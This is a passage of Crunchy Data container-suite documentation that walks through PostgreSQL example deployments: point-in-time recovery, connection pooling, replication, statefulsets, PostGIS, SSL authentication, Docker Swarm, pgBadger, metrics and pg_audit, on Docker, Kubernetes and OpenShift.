able to verify that the\ndatabase was restored to the point before creating the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\n....\n\nThis SQL command should show that the pitrtest table does not exist\nat this recovery time. The output should be similar to:\n....\nERROR: relation \"pitrtest\" does not exist\n....\n\nPostgreSQL allows you to pause the recovery process if the target name\nor time is specified. This pause would allow a DBA a chance to review\nthe recovery time\/name and see if this is what they want or expect. If so,\nthe DBA can run the following command to resume and complete the recovery:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nUntil you run the statement above, the database will be left in read-only\nmode.\n\nNext, run the script to restore the database\nto the `afterchanges` restore point. Update the `RECOVERY_TARGET_NAME` to `afterchanges`:\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nAfter this restore, you should be able to see the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nLastly, start a recovery using all of the WAL files. This will get the\nrestored database as current as possible. 
To do so, edit the script\nto remove the `RECOVERY_TARGET_NAME` environment setting completely:\n....\n.\/run-restore-pitr.sh\nsleep 30\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'create table foo (id int)'\n....\n\nAt this point, you should be able to create new data in the restored database\nand the test table should be present. When you recover the entire\nWAL history, resuming the recovery is not necessary to enable writes.\n\n==== Kubernetes and OpenShift\n\nStart by running the example database container:\n....\ncd $CCPROOT\/examples\/kube\/pitr\n.\/run-pitr.sh\n....\n\nThis step will create a database container, *pitr*. This\ncontainer is configured to continuously write WAL segment files\nto a mounted volume (`\/pgwal`).\n\nAfter you start the database, you will create a base backup\nusing this command:\n....\n.\/run-backup-pitr.sh\n....\n\nThis will create a backup and write the backup files to a persistent\nvolume (`\/pgbackup`).\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\n${CCP_CLI} delete pod pitr\n....\n\nNext, we will create 3 different restored database containers based\nupon the base backup and the saved WAL files.\n\nFirst, get the BACKUP_PATH created by the `backup-pitr` example by viewing the pods logs:\n\n....\n${CCP_CLI} logs backup-pitr-8sfkh | grep PATH\nThu May 10 18:07:58 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/pitr-backups\/2018-05-10-18-07-58.\n....\n\nEdit the `restore-pitr.json` file and change the `BACKUP_PATH` environment variable\nusing the path discovered above (note: `\/pgdata\/` is not required and should be excluded\nin the variable):\n\n....\n{\n \"name\": \"BACKUP_PATH\",\n \"value\": \"pitr-backups\/2018-05-10-18-07-58\"\n{\n....\n\nNext, we restore prior to the `beforechanges` recovery target. This\nrecovery point is *before* the *pitrtest* table is created.\n\nEdit the `restore-pitr.json` file, and edit the environment\nvariable to indicate we want to use the `beforechanges` recovery\npoint:\n....\n{\n \"name\": \"RECOVERY_TARGET_NAME\",\n \"value\": \"beforechanges\"\n{\n....\n\n\nThen run the following to create the restored database container:\n....\n.\/run-restore-pitr.sh\n....\n\nAfter the database has restored, you should be able to perform\na test to see if the recovery worked as expected:\n....\npsql -h restore-pitr -U postgres postgres -c 'table pitrtest'\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nThe output of these commands should show that the *pitrtest* table is not\npresent. 
It should also show that you can not create a new table\nbecause the database is paused in read-only mode.\n\nTo make the database resume as a writable database, run the following\nSQL command:\n....\nselect pg_wal_replay_resume();\n....\n\nIt should then be possible to write to the database:\n....\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nYou can also test that if `afterchanges` is specified, that the\n*pitrtest* table is present but that the database is still in recovery\nmode.\n\nLastly, you can test a full recovery using *all* of the WAL files, if\nyou remove the `RECOVERY_TARGET_NAME` environment variable completely.\n\nThe storage portions of this example can all be found under `$CCP_STORAGE_PATH`.\n\n== Connection Pooling\n\n=== pgBouncer\n\nCrunchy pgBouncer is a lightweight connection pooler for PostgreSQL databases.\n\nThe following examples create the following containers:\n\n * pgBouncer Primary\n * pgBouncer Replica\n * PostgreSQL Primary\n * PostgreSQL Replica\n\nIn Kubernetes and OpenShift, this example will also create:\n\n * pgBouncer Primary Service\n * pgBouncer Replica Service\n * Primary Service\n * Replica Service\n * PostgreSQL Secrets\n * pgBouncer Secrets\n\nTo cleanup the objects created by this example, run the following in the `pgbouncer` example directory:\n\n....\n.\/cleanup.sh\n....\n\n{{% notice tip %}}\nFor more information on `pgBouncer`, see the link:https:\/\/pgbouncer.github.io[official website].\n{{% \/notice %}}\n\n==== Docker\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/docker\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h 0.0.0.0 -p 6432 -U testuser\npsql -d userdb -h 0.0.0.0 -p 6433 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h 0.0.0.0 -p 6432 -U pgbouncer\npsql -d pgbouncer -h 0.0.0.0 -p 6433 -U pgbouncer\n....\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nOpenShift: If custom configurations aren't being mounted, an *emptydir* volume is required\nto be mounted at `\/pgconf`.\n{{% \/notice %}}\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/kube\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h pgbouncer-primary -p 6432 -U testuser\npsql -d userdb -h pgbouncer-replica -p 6432 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h pgbouncer-primary -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\npsql -d pgbouncer -h pgbouncer-replica -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\n....\n\n=== pgPool II\n\nAn example is provided that will run a *pgPool II* container in conjunction with the\n*primary-replica* example provided above.\n\nYou can execute both `INSERT` and `SELECT` statements after connecting to pgpool.\nThe container will direct `INSERT` statements to the primary and `SELECT` statements\nwill be sent round-robin to both the primary and replica.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the nodes that pgpool is configured for by running:\n....\npsql -h pgpool -U testuser userdb -c 'show pool_nodes'\n....\n\nTo shutdown the instance and remove the container for each 
example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h localhost -U testuser -p 12003 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy the pgpool service:\n....\ncd $CCPROOT\/examples\/kube\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h pgpool -U testuser userdb\n....\n\n== Database\n\n=== Single Primary\n\nThis example starts a single PostgreSQL container and service, the most simple\nof examples.\n\nThe container creates a default database called *userdb*, a default user called *testuser*\nand a default password of *password*.\n\nFor all environments, the script additionally creates:\n\n * A persistent volume claim\n * A crunchy-postgres container named *primary*\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * A pod named *primary*\n * A service named *primary*\n * A PVC named *primary-pgdata*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nTo create the example:\n....\ncd $CCPROOT\/examples\/kube\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h primary -U postgres postgres\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this\nexample using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary\/README.md[here].\n\n=== PostgreSQL Deployment\n\nStarting in release 1.2.8, the PostgreSQL container can accept\nan environment variable named `PGDATA_PATH_OVERRIDE`. If set,\nthe `\/pgdata\/subdir` path will use a subdirectory name of your\nchoosing instead of the default which is the hostname of the container.\n\nThis example shows how a Deployment of a PostgreSQL primary is\nsupported. A pod is a deployment that uses a hostname generated by\nKubernetes; because of this, a new hostname will be defined upon\nrestart of the primary pod.\n\nFor finding the `\/pgdata` that pertains to the pod, you will need\nto specify a `\/pgdata\/subdir` name that never changes. 
This requirement is\nhandled by the `PGDATA_PATH_OVERRIDE` environment variable.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nThis example will create the following in your Kubernetes and OpenShift environments:\n\n * primary and replica services\n * primary-deployment deployment\n * replica-deployment statefulset\n * ConfigMap to hold a custom `postgresql.conf`, `setup.sql`, and\n `pg_hba.conf` files\n * Secrets for the primary user, superuser, and normal user to\n hold the passwords\n * Volume mount for `\/backrestrepo` and `\/pgwal`\n\nThe persisted data for the PostgreSQL primary is found under `\/pgdata\/primary-deployment`.\nIf you delete the primary pod, the deployment will create another\npod for the primary and will be able to start up immediately since\nit works out of the same `\/pgdata\/primary-deployment` data directory.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/primary-deployment\n.\/run.sh\n....\n\nTo scale the replica statefulset, run the following command:\n\n....\n${CCP_CLI?} scale --replicas=2 statefulset replica-deployment\n....\n\n{{% notice warning %}}\nThis example only creates enough Persistent Volumes for a maximum of 2 replicas.\nIf you are not using storage classes, the maximum amount of replicas this example can\nbe scaled to is 2.\n{{% \/notice %}}\n\n=== Replication\n\nThis example starts a primary and a replica pod containing a PostgreSQL database.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nFor the Docker environment, the script additionally creates:\n\n * A docker volume using the local driver for the primary\n * A docker volume using the local driver for the replica\n * A container named *primary* binding to port 12007\n * A container named *replica* binding to port 12008\n * A mapping of the PostgreSQL port 5432 within the container to the localhost port 12000\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * emptyDir volumes for persistence\n * A pod named *pr-primary*\n * A pod named *pr-replica*\n * A pod named *pr-replica-2*\n * A service named *pr-primary*\n * A service named *pr-replica*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary-replica\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -p 12007 -U testuser -W userdb\npsql -h localhost -p 12008 -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy a primary and replica database cluster:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica\n.\/run.sh\n....\n\nIt takes about a minute for the replica to begin replicating with the\nprimary. To test out replication, see if replication is underway\nwith this command:\n\n....\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'table pg_stat_replication'\n....\n\nIf you see a line returned from that query it means the primary is replicating\nto the replica. 
Try creating some data on the primary:\n\n....\n\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'create table foo (id int)'\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'insert into foo values (1)'\n....\n\nThen verify that the data is replicated to the replica:\n\n....\n${CCP_CLI?} exec -ti pr-replica -- psql -d postgres -c 'table foo'\n....\n\n*primary-replica-dc*\n\nIf you wanted to experiment with scaling up the number of replicas, you can run the following example:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica-dc\n.\/run.sh\n....\n\nYou can verify that replication is working using the same commands as above.\n\n....\n${CCP_CLI?} exec -ti primary-dc -- psql -d postgres -c 'table pg_stat_replication'\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this example\nusing Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary-replica\/README.md[here].\n\n=== Synchronous Replication\n\nThis example deploys a PostgreSQL cluster with a primary, a synchronous replica, and\nan asynchronous replica. The two replicas share the same service.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/sync\n.\/run.sh\n....\n\nYou can test the replication status on the primary by using the following command\nand the password *password*:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'table pg_stat_replication'\n....\n\nYou should see 2 rows; 1 for the asynchronous replica and 1 for the synchronous replica. The\n`sync_state` column shows values of async or sync.\n\nYou can test replication to the replicas by first entering some data on\nthe primary, and secondly querying the replicas for that data:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'create table foo (id int)'\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'insert into foo values (1)'\npsql -h 127.0.0.1 -p 12011 -U postgres postgres -c 'table foo'\npsql -h 127.0.0.1 -p 12012 -U postgres postgres -c 'table foo'\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/sync\n.\/run.sh\n....\n\nConnect to the *primarysync* and *replicasync* databases as follows for both the\nKubernetes and OpenShift environments:\n....\npsql -h primarysync -U postgres postgres -c 'create table test (id int)'\npsql -h primarysync -U postgres postgres -c 'insert into test values (1)'\npsql -h primarysync -U postgres postgres -c 'table pg_stat_replication'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\n....\n\nThis set of queries will show you the IP address of the PostgreSQL replica\ncontainer. Note the changing IP address due to the round-robin service proxy\nbeing used for both replicas. The example queries also show that both\nreplicas are replicating successfully from the primary.\n\n=== Statefulsets\n\nThis example deploys a statefulset named *statefulset*. The statefulset\nis a new feature in Kubernetes as of version 1.5 and in OpenShift Origin as of\nversion 3.5. 
Statefulsets have replaced PetSets going forward.\n\nPlease view link:https:\/\/kubernetes.io\/docs\/concepts\/abstractions\/controllers\/statefulsets\/[this Kubernetes description]\nto better understand what a Statefulset is and how it works.\n\nThis example creates 2 PostgreSQL containers to form the set. At\nstartup, each container will examine its hostname to determine\nif it is the first container within the set of containers.\n\nThe first container is determined by the hostname suffix assigned\nby Kubernetes to the pod. This is an ordinal value starting with *0*.\nIf a container sees that it has an ordinal value of *0*, it will\nupdate the container labels to add a new label of:\n....\nname=$PG_PRIMARY_HOST\n....\n\nIn this example, `PG_PRIMARY_HOST` is specified as `statefulset-primary`.\n\nBy default, the containers specify a value of `name=statefulset-replica`.\n\nThere are 2 services that end-user applications will use to\naccess the PostgreSQL cluster: one service (statefulset-primary) routes to the primary\ncontainer, and the other (statefulset-replica) routes to the replica containers.\n....\n$ ${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\nkubernetes 10.96.0.1 <none> 443\/TCP 22h\nstatefulset None <none> 5432\/TCP 1h\nstatefulset-primary 10.97.168.138 <none> 5432\/TCP 1h\nstatefulset-replica 10.97.218.221 <none> 5432\/TCP 1h\n....\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/statefulset\n.\/run.sh\n....\n\nYou can access the primary database as follows:\n....\npsql -h statefulset-primary -U postgres postgres\n....\n\nYou can access the replica databases as follows:\n....\npsql -h statefulset-replica -U postgres postgres\n....\n\nYou can scale the number of containers using this command; this will\nessentially create an additional replica database.\n....\n${CCP_CLI} scale --replicas=3 statefulset statefulset\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to\nrun this example using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/statefulset\/README.md[here].\n\n=== Geospatial (PostGIS)\n\nAn example is provided that will run a PostgreSQL with PostGIS pod and service in Kubernetes and OpenShift, and a container in Docker.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser*, and a default password of *password*.\n\nYou can view the extensions that postgres-gis has enabled by running the following command and viewing the listed PostGIS packages:\n....\npsql -h postgres-gis -U testuser userdb -c '\\dx'\n....\n\nTo validate that PostGIS is installed and which version is running, run the command:\n\n....\npsql -h postgres-gis -U testuser userdb -c \"SELECT postgis_full_version();\"\n....\n\nYou should expect to see output similar to:\n\n....\npostgis_full_version\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n POSTGIS=\"2.4.2 r16113\" PGSQL=\"100\" GEOS=\"3.5.0-CAPI-1.9.0 r4084\" PROJ=\"Rel. 
4.8.0, 6 March 2012\" GDAL=\"GDAL 1.11.4, released 2016\/01\/25\" LIBXML=\"2.9.1\" LIBJSON=\"0.11\" TOPOLOGY RASTER\n(1 row)\n....\n\nAs an exercise for invoking some of the basic PostGIS functionality for validation, try defining a 2D geometry point while giving inputs of\nlongitude and latitude through this command.\n\n....\npsql -h postgres-gis -U testuser userdb -c \"select ST_MakePoint(28.385200,-81.563900);\"\n....\n\nYou should expect to see output similar to:\n\n....\n st_makepoint\n--------------------------------------------\n 0101000000516B9A779C623C40B98D06F0166454C0\n(1 row)\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/postgres-gis\n.\/run.sh\n....\n\nEnter the following command to connect to the postgres-gis container that is\nmapped to your local port 12000:\n....\npsql -h localhost -U testuser -p 12000 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/postgres-gis\n.\/run.sh\n....\n\n=== Custom Configuration\n\nYou can use your own version of the SQL file `setup.sql` to customize\nthe initialization of database data and objects when the container and\ndatabase are created.\n\nThis works by placing a file named `setup.sql` within the `\/pgconf` mounted volume\ndirectory. Portions of the `setup.sql` file are required for the container\nto work; please see comments within the sample `setup.sql` file.\n\nIf you mount a `\/pgconf` volume, crunchy-postgres will look at that directory\nfor `postgresql.conf`, `pg_hba.conf`, `pg_ident.conf`, SSL server\/ca certificates and `setup.sql`.\nIf it finds one of them it will use that file instead of the default files.\n\n==== Docker\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/custom-config\n.\/run.sh\n....\n\n=== SSL Authentication\n\nThis example shows how you can configure PostgreSQL to use SSL for\nclient authentication.\n\nThe example requires SSL certificates and keys to be created. Included in\nthe examples directory is a script to create self-signed certificates (server\nand client) for the example: `$CCPROOT\/examples\/ssl-creator.sh`.\n\nThe example creates a client certificate for the user `testuser`. 
Furthermore,\nthe server certificate is created for the server name `custom-config-ssl`.\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config-ssl\n.\/run.sh\n....\n\nAnd the example can be run in the following directory for the Kubernetes and OpenShift environments:\n....\ncd $CCPROOT\/examples\/kube\/custom-config-ssl\n.\/run.sh\n....\n\nA required step to make this example work is to define\nin your `\/etc\/hosts` file an entry that maps `custom-config-ssl`\nto the service IP address for the container.\n\nFor instance, if your service has an address as follows:\n....\n${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\ncustom-config-ssl 172.30.211.108 <none> 5432\/TCP\n....\n\nThen your `\/etc\/hosts` file needs an entry like this:\n....\n172.30.211.108 custom-config-ssl\n....\n\nFor production Kubernetes and OpenShift installations, you will likely prefer to have DNS\nnames resolve to the PostgreSQL service and to generate\nserver certificates using those DNS names instead of the example\nname `custom-config-ssl`.\n\nIf a client needs to confirm the identity of the server, `verify-full` can be\nspecified for `sslmode` in the connection string. This will check that the server\nhostname matches the name in the server certificate. Additionally, the proper connection parameters\nmust be specified in the connection string for the certificate information required to\ntrust and verify the identity of the server (`sslrootcert` and `sslcrl`), and to\nauthenticate the client using a certificate (`sslcert` and `sslkey`):\n\n....\npsql \"postgresql:\/\/testuser@custom-config-ssl:5432\/userdb?\\\nsslmode=verify-full&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nTo connect via IP, `sslmode` can be changed to `require`. This will verify the server\nby checking the certificate chain up to the trusted certificate authority, but will not\nverify that the hostname matches the certificate, as occurs with `verify-full`. The same\nconnection parameters as above can then be provided for the client and server certificate\ninformation.\n\n....\npsql \"postgresql:\/\/testuser@IP_OF_PGSQL:5432\/userdb?\\\nsslmode=require&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nYou should see a connection that looks like the following:\n....\npsql (10.5)\nSSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)\nType \"help\" for help.\n\nuserdb=>\n....\n\n=== Docker Swarm\n\nThis example shows how to run a primary and replica database\ncontainer on a Docker Swarm (v.1.12) cluster.\n\nFirst, set up a cluster. 
The Kubernetes libvirt coreos cluster\nexample works well; see link:http:\/\/kubernetes.io\/docs\/getting-started-guides\/libvirt-coreos\/[coreos-libvirt-cluster].\n\nNext, on each node, create the Swarm using these\nlink:https:\/\/docs.docker.com\/engine\/swarm\/swarm-tutorial\/create-swarm\/[Swarm Install instructions].\n\nRun this command on the manager node:\n....\ndocker swarm init --advertise-addr 192.168.10.1\n....\n\nThen run this command on all the worker nodes:\n....\n docker swarm join \\\n --token SWMTKN-1-65cn5wa1qv76l8l45uvlsbprogyhlprjpn27p1qxjwqmncn37o-015egopg4jhtbmlu04faon82u \\\n 192.168.10.1:2377\n....\n\nBefore creating Swarm services, it is necessary\nto define an overlay network to be used by the services you will\ncreate. This can be done as follows:\n....\ndocker network create --driver overlay crunchynet\n....\n\nWe want to have the primary database always placed on\na specific node. This is accomplished using node constraints\nas follows:\n....\ndocker node inspect kubernetes-node-1 | grep ID\ndocker node update --label-add type=primary 18yrb7m650umx738rtevojpqy\n....\n\nIn the above example, the `kubernetes-node-1` node with ID\n`18yrb7m650umx738rtevojpqy` has a user-defined label of *primary* added to it.\nThe primary service specifies *primary* as a constraint when created; this\ntells Swarm to place the service on that specific node. The replica specifies\na constraint of `node.labels.type != primary` to have the replica\nalways placed on a node that is not hosting the primary service.\n\n==== Docker\n\nAfter you set up the Swarm cluster, you can then run this example as follows on the *Swarm Manager Node*:\n....\ncd $CCPROOT\/examples\/docker\/swarm-service\n.\/run.sh\n....\n\nYou can then find the nodes that are running the primary and replica containers\nby running:\n....\ndocker service ps primary\ndocker service ps replica\n....\n\nYou can also scale up the number of *replica* containers.\n....\ndocker service scale replica=2\ndocker service ls\n....\n\nVerify you have two replicas within PostgreSQL by viewing the `pg_stat_replication` table.\nThe password is *password* by default when logged into the `kubernetes-node-1` host:\n....\ndocker exec -it $(docker ps -q) psql -U postgres -c 'table pg_stat_replication' postgres\n....\n\nYou should see a row for each replica along with its replication status.\n\n== Failover\n\n=== Watch\n\nCrunchy Watch is an application wrapped in a container that watches a PostgreSQL\nprimary database and waits for a failure to occur, at which point a failover is\nperformed to promote a replica.\n\nThe crunchy-watch container, while originally part of the Container Suite, has been\nsplit out into its own project. 
More information on the Watch container and its\ncapabilities can be found in the new project repository located at\nhttps:\/\/github.com\/CrunchyData\/crunchy-watch.\n\n== Metrics and Performance\n\n=== pgBadger\n\npgbadger is a PostgreSQL tool that reads the log files from a specified database\nin order to produce an HTML report that shows various PostgreSQL statistics and graphs.\nThis example runs the pgbadger HTTP server against a crunchy-postgres container and\nillustrates how to view the generated reports.\n\nThe port utilized for this tool is port 14000 for Docker environments and port 10000\nfor Kubernetes and OpenShift environments.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser*, and a default password of *password*.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\nendpoint you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/127.0.0.1:14000\/api\/badgergenerate\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\nendpoint you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/pgbadger:10000\/api\/badgergenerate\n....\n\nYou can view the database container logs using these commands:\n....\n${CCP_CLI} logs pgbadger -c pgbadger\n${CCP_CLI} logs pgbadger -c postgres\n....\n\n=== Metrics Collection\n\nYou can collect various PostgreSQL metrics from your database\ncontainer by running a crunchy-collect container that points\nto your database container.\n\nThis example starts up the following containers:\n\n * Collect (crunchy-collect)\n * Grafana (crunchy-grafana)\n * PostgreSQL (crunchy-postgres)\n * Prometheus (crunchy-prometheus)\n\nEvery 5 seconds by default, Prometheus will scrape the Collect container\nfor metrics. These metrics will then be visualized by Grafana, which by default can be accessed\nwith the following credentials:\n\n* Username: *admin*\n* Password: *password*\n\nBy default, Prometheus detects which environment it's running on (Docker, Kubernetes, or OpenShift Container Platform)\nand applies a default configuration. If this container is running on Kubernetes or OpenShift Container Platform,\nit will use the Kubernetes API to discover pods with the label `\"crunchy-collect\": \"true\"`.\n\nThe collect container *must* have this label to be discovered in these environments.\nAdditionally, the collect container uses a special PostgreSQL role `ccp_monitoring`.\nThis user is created by setting the `PGMONITOR_PASSWORD` environment variable on the\nPostgreSQL container.\n\nDiscovering pods requires a cluster role service account. 
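\n\nAs a point of reference, the discovery label described above sits in the collect pod template's metadata; this fragment is an illustrative sketch rather than a copy of the example's JSON:\n\n....\n\"metadata\": {\n  \"labels\": {\n    \"crunchy-collect\": \"true\"\n  }\n}\n....\n\n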
See the\nlink:https:\/\/github.com\/crunchydata\/crunchy-containers\/blob\/master\/examples\/kube\/metrics\/metrics.json[Kubernetes and OpenShift]\nmetrics JSON file for more details.\n\nFor Docker environments, the collect hostname must be specified as an environment\nvariable.\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo start this set of containers, run the following:\n....\ncd $CCPROOT\/examples\/docker\/metrics\n.\/run.sh\n....\n\nYou will be able to access the Grafana and Prometheus services from the following\nweb addresses:\n\n * Grafana (http:\/\/0.0.0.0:3000)\n * Prometheus (http:\/\/0.0.0.0:9090)\n\nThe crunchy-postgres container is accessible on port *5432*.\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/metrics\n.\/run.sh\n....\n\nIt's required to use `port-forward` to access the Grafana dashboard. To start the\nport-forward, run the following command:\n\n....\n${CCP_CLI} port-forward metrics 3000:3000\n${CCP_CLI} port-forward metrics 9090:9090\n....\n\n * The Grafana dashboard can then be accessed from `http:\/\/127.0.0.1:3000`\n * The Prometheus dashboard can then be accessed from `http:\/\/127.0.0.1:9090`\n\nYou can view the container logs using these commands:\n....\n${CCP_CLI} logs -c grafana metrics\n${CCP_CLI} logs -c prometheus metrics\n${CCP_CLI} logs -c collect primary-metrics\n${CCP_CLI} logs -c postgres primary-metrics\n${CCP_CLI} logs -c collect replica-metrics\n${CCP_CLI} logs -c postgres replica-metrics\n....\n\n=== pg_audit\n\nThis example demonstrates how to enable pg_audit output.\nAs of release 1.3, pg_audit is included in the crunchy-postgres\ncontainer and is added to the PostgreSQL shared library list in\n`postgresql.conf`.\n\nGiven the numerous ways pg_audit can be configured, the exact\npg_audit configuration is left to the user to define. pg_audit\nallows you to configure auditing rules either in `postgresql.conf`\nor within your SQL script.\n\nFor this test, we place pg_audit statements within a SQL script\nand verify that auditing is enabled and working. If you choose\nto configure pg_audit via a `postgresql.conf` file, then you will\nneed to define your own custom file and mount it to override the\ndefault `postgresql.conf` file.\n\n==== Docker\n\nRun the following to create a database container:\n....\ncd $CCPROOT\/examples\/docker\/pgaudit\n.\/run.sh\n....\n\nThis starts an instance of the pg_audit container (running crunchy-postgres)\non port 12005 on localhost. The test script is then automatically executed.\n\nThis test executes a SQL file which contains pg_audit 